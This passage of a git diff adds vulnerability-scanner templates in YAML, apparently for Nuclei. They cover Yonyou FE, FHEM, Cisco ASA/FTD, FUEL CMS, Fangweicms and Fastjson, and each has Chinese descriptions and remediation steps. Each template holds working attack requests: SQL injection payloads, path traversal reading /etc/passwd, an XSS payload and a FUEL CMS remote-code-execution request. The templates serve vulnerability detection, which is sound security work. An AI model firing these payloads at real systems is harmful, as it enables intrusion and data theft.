4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,':::o:::') + path: + - '{{BaseURL}}/sys/plugin/plugin_form_edit.jsp?done=&key=c%25%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%28111%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29--' + - '{{BaseURL}}/sys/plugin/plugin_datasource_edit.jsp?done=&key=c%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%28111%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%2CNULL--' + - '{{BaseURL}}/cooperate/flow/selectMUDR.jsp?id=1%29%20AND%206170%3DCONVERT%28INT%2C%28SELECT%20CHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%28111%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%29%29%20AND%20%281%3D1' + - '{{BaseURL}}/indexsearch/filter.jsp?tableId=1%20AND%201651%3DCONVERT%28INT%2C%28SELECT%20CHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%28111%29%2BCHAR%2858%29%2BCHAR%2858%29%2BCHAR%2858%29%29%29' + - '{{BaseURL}}/indexsearch/filter.jsp?tableId=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHR%2858%29%7C%7CCHR%2858%29%7C%7CCHR%2858%29%7C%7CCHR%28111%29%7C%7CCHR%2858%29%7C%7CCHR%2858%29%7C%7CCHR%2858%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--' + - '{{BaseURL}}/system/config/groupTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,sys.fn_varbintohexstr(%27%3A%3A%3Ao%3A%3A%3A%27),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +- matchers: + - type: dsl + condition: and + dsl: + - 'status_code_1==200 && status_code_2==200 && status_code_3==200 ' + - body_1 != body_2 && body_1 == body_3 + path: + - '{{BaseURL}}/{{varPath}}' + - '{{BaseURL}}/{{varPath}}%27%20or%20%271%27=%271' + - '{{BaseURL}}/{{varPath}}%27%20or%20%271%27=%272' + attack: batteringram + method: GET + payloads: + varPath: + - permissionsreport/pMonitor.jsp?photoId=1&modelid=-1 + - sys/left.jsp?lx=-1 + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - duration >= 5 + path: + - '{{BaseURL}}/{{varPath}}%27%20AND%201%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2871%29%7C%7CCHR%28103%29%7C%7CCHR%2873%29%7C%7CCHR%2867%29%2C5%29%20AND%20%271%27%3D%271' + - '{{BaseURL}}/{{varPath}}%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--' + attack: batteringram + method: GET + payloads: + varPath: + - fenc/syncsubject.jsp?pk_corp=1 + - flex/newsmessage.jsp?uname=1 + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-SQLI-file_publish_open.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-SQLI-file_publish_open.yaml" new file mode 100755 index 000000000..9250736b1 --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-SQLI-file_publish_open.yaml" @@ -0,0 +1,36 @@ +id: yonyouFE-SQLI-file_publish_open +info: + name: 用友FE file_publish_open SQL注入 + author: + - 折跃 + description: |- + 用友FE协作办公平台file_publish_open.jsp SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/document/file_publish_open.jsp?id=1%29%20AND%201387%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2886%29%7C%7CCHR%2875%29%7C%7CCHR%2886%29%7C%7CCHR%28116%29%2C5%29--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-sqli-assetsTestList.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-sqli-assetsTestList.yaml" new file mode 100755 index 000000000..6eaff60bf --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyouFE-sqli-assetsTestList.yaml" @@ -0,0 +1,38 @@ +id: yonyouFE-sqli-assetsTestList +info: + name: 用友FE assetsTestList SQL注入漏洞 + author: + - 折跃 + description: |- + 用友FE协作办公平台assetsTestList.jsp SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/assetsGroupReport/assetsTestList.jsp?deptCode=22&key=22&unitCode=11&startDate=2012-01-01&endDate=2012-02-01%27%29%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29--%20-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyou_fe-sqli-left.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyou_fe-sqli-left.yaml" new file mode 100755 index 000000000..5f12d6f74 --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/yonyou_fe-sqli-left.yaml" @@ -0,0 +1,38 @@ +id: yonyou_fe-sqli-left +info: + name: 用友FE left.jsp联合注入漏洞 + author: + - 折跃 + description: |- + 用友FE协作办公平台left.jsp SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/sys/left.jsp?lx=1%27%20UNION%20ALL%20SELECT%20null%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--%20-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/youyou_FE-SQLI-showphoto.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/youyou_FE-SQLI-showphoto.yaml" new file mode 100755 index 000000000..1cd882258 --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/youyou_FE-SQLI-showphoto.yaml" @@ -0,0 +1,40 @@ +id: youyou_FE-SQLI-showphoto +info: + name: 用友FE showphoto SQL注入 + author: + - 折跃 + description: |- + 用友FE协作办公平台showphoto SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - 'status_code_1==200 && status_code_2==200 && status_code_3==200 ' + - body_1 == body_2 && body_1 != body_3 + path: + - '{{BaseURL}}/showphoto.xf?photoid=1' + - '{{BaseURL}}/showphoto.xf?photoid=1%20AND%2076%3D76' + - '{{BaseURL}}/showphoto.xf?photoid=1%20AND%2076%3D69' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/FHEM/CVE-2020-19360.yaml b/config/51pwn/yaml/FHEM/CVE-2020-19360.yaml new file mode 100755 index 000000000..265d48036 --- /dev/null +++ b/config/51pwn/yaml/FHEM/CVE-2020-19360.yaml @@ -0,0 +1,52 @@ +id: CVE-2020-19360 +info: + name: FHEM 6.0 - Local File Inclusion + author: + - 0x_akoko + tags: + - fhem + - lfi + - cve + - cve2020 + description: |2- + FHEM 信息泄露漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + reference: + - /~https://github.com/emreovunc/fhem-6.0-local-file-inclusion-lfi-vulnerability/blob/master/readme.md + - https://www.cvedetails.com/cve/cve-2020-19360/ + - /~https://github.com/emreovunc/fhem-6.0-local-file-inclusion-lfi-vulnerability + - https://emreovunc.com/blog/en/fhem-v6.0-lfi-vulnerability-01.png + severity: high + classification: + cve-id: + - cve-2020-19360 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability + + + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' + method: GET diff --git a/config/51pwn/yaml/FTD/ASA/CVE-2018-0296.yaml b/config/51pwn/yaml/FTD/ASA/CVE-2018-0296.yaml new file mode 100755 index 000000000..0cc9599e1 --- /dev/null +++ b/config/51pwn/yaml/FTD/ASA/CVE-2018-0296.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-0296 +info: + name: Cisco ASA path traversal vulnerability + author: + - l0ne1y + description: |- + Cisco ASA file_list.json path 文件读取漏洞 + Cisco 3000 Series Industrial Security Appliance(ISA)等都是美国思科(Cisco)公司的安全设备。ASA Software和Firepower Threat Defense (FTD) Software都是分别运行在不同设备中的操作系统。 + + 多款Cisco产品中的ASA Software和FTD Software的Web界面存在输入验证漏洞,该漏洞源于程序缺少对HTTP URL的正确验证。远程攻击者可通过向受影响设备发送特制的HTTP请求利用该漏洞造成拒绝服务或造成信息泄露。以下产品受到影响:Cisco 3000 Series Industrial Security Appliance (ISA);ASA 1000V Cloud Firewall;ASA 5500 Series Adaptive Security Appliances;ASA 5500-X Series Next-Generation Firewalls;ASA Services Module for Cisco Catalyst 6500 Series Switches和Cisco 7600 Series Routers;Adaptive Security Virtual Appliance (ASAv);Firepower 2100 Series Security Appliance;Firepower 4100 Series Security Appliance;Firepower 9300 ASA Security Module;FTD Virtual (FTDv)。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + part: body + words: + - ///sessions + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions' + method: GET + headers: + Accept-Encoding: deflate diff --git a/config/51pwn/yaml/FTD/ASA/CVE-2020-3187.yaml b/config/51pwn/yaml/FTD/ASA/CVE-2020-3187.yaml new file mode 100755 index 000000000..12878c981 --- /dev/null +++ b/config/51pwn/yaml/FTD/ASA/CVE-2020-3187.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-3187 +info: + name: Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense + - Directory Traversal + author: + - l0ne1y + description: |- + Cisco ASA/FTD 任意文件删除漏洞 + + Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。 + + Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞,该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID删除文件。 +requests: +- matchers: + - type: word + part: header + words: + - webvpn + - Webvpn + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/+CSCOE+/session_password.html' + method: GET diff --git a/config/51pwn/yaml/FTD/ASA/CVE-2020-3452.yaml b/config/51pwn/yaml/FTD/ASA/CVE-2020-3452.yaml new file mode 100755 index 000000000..2fb085a24 --- /dev/null +++ b/config/51pwn/yaml/FTD/ASA/CVE-2020-3452.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-3452 +info: + name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) + - Arbitrary File Retrieval + author: + - l0ne1y + description: |- + Cisco ASA/FTD AnyConnect 任意远程文件读取漏洞 + Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。
+ Cisco ASA Software和FTD Software的web服务接口存在只读路径遍历漏洞。该漏洞源于程序未正确验证HTTP请求中的URL输入。未经授权的远程攻击者可利用向受影响设备发送特制的包含目录遍历字符序列的HTTP请求发起目录遍历攻击并读取目标系统上的敏感文件。
+   + severity: high + remediation: |- + **官方修复方案:** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 +requests: +- matchers: + - type: word + condition: and + words: + - INTERNAL_PASSWORD_ENABLED + - CONF_VIRTUAL_KEYBOARD + path: + - '{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../' + - '{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua' + method: GET diff --git a/config/51pwn/yaml/FTD/ASA/CVE-2020-3580.yaml b/config/51pwn/yaml/FTD/ASA/CVE-2020-3580.yaml new file mode 100755 index 000000000..ea0cddcbb --- /dev/null +++ b/config/51pwn/yaml/FTD/ASA/CVE-2020-3580.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-3580 +info: + name: Cisco ASA XSS + author: + - l0ne1y + description: |- + Cisco ASA/FTD 跨站脚本漏洞 + Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。 Cisco Adaptive Security Appliance (ASA) 和 Cisco Firepower Threat Defense (FTD) 存在跨站脚本漏洞,该漏洞源于受影响设备的web服务接口没有充分验证用户提供的输入。攻击者可利用该漏洞在界面的上下文中执行任意脚本代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + raw: + - | + POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E diff --git a/config/51pwn/yaml/FUEL CMS/CVE-2018-16763.yaml b/config/51pwn/yaml/FUEL CMS/CVE-2018-16763.yaml new file mode 100755 index 000000000..b875a2a8f --- /dev/null +++ b/config/51pwn/yaml/FUEL CMS/CVE-2018-16763.yaml @@ -0,0 +1,54 @@ +id: CVE-2018-16763 +info: + name: FUEL CMS 1.4.1 - Remote Code Execution + author: + - pikpikcu + tags: + - cve + - cve2018 + - fuelcms + - rce + description: |- + FUEL CMS 注入漏洞 + FUEL CMS是一款基于Codelgniter框架的内容管理系统(CMS)。 + + FUEL CMS 1.4.1版本中的pages/select/页面的‘filter’参数和preview/页面的‘data’参数存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。 + reference: + - https://www.exploit-db.com/exploits/47138 + - https://www.getfuelcms.com/ + - /~https://github.com/daylightstudio/fuel-cms/releases/tag/1.4.1 + - https://nvd.nist.gov/vuln/detail/cve-2018-16763 + severity: critical + classification: + cve-id: + - cve-2018-16763 + cwe-id: + - cwe-74 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:http://www.getfuelcms.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + matchers-condition: and + raw: + - | + GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/Fangweicms/Fangweicms-SQLi.yaml b/config/51pwn/yaml/Fangweicms/Fangweicms-SQLi.yaml new file mode 100755 index 000000000..5990167ea --- /dev/null +++ b/config/51pwn/yaml/Fangweicms/Fangweicms-SQLi.yaml @@ -0,0 +1,34 @@ +id: Fangweicms-SQLi +info: + name: Fangweicms SQL注入漏洞 + author: + - l0ne1y + description: |- + Fangweicms sql注入漏洞 + Fangweicms是深圳方维网络科技有限公司推出的面向企业建站的一套标准化解决方案。在其前期版本中存在sql注入漏洞。 + severity: high + remediation: |- + **官方修复方案** + 请关注官方链接,下载最新版本CMS + https://www.szfangwei.cn/ + + **临时修复方案** + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: body + words: + - '{{veritify}}' + path: + - '{{BaseURL}}/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28{{veritify}}%29%23' + method: GET +variables: + veritify: '{{rand_int(200000000, 210000000)}}' diff --git a/config/51pwn/yaml/Fastjson/fastjson1_2_47-rce-Deserialization.yaml b/config/51pwn/yaml/Fastjson/fastjson1_2_47-rce-Deserialization.yaml new file mode 100755 index 000000000..579b2f57e --- /dev/null +++ b/config/51pwn/yaml/Fastjson/fastjson1_2_47-rce-Deserialization.yaml @@ -0,0 +1,51 @@ +id: fastjson1_2_47-rce-Deserialization +info: + name: Fastjson 1.2.47 Deserialization RCE + author: + - zh + tags: + - fastjson + - rce + - deserialization + - oast + description: |- + Fastjson 1.2.47 Deserialization RCE + Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 + reference: + - /~https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce + - https://www.freebuf.com/vuls/208339.html + - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 + - /~https://github.com/wyzxxz/fastjson_rce_tool + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁,确认 fastjson 版本至少升级到 1.2.58,同时确认自身服务的 Java 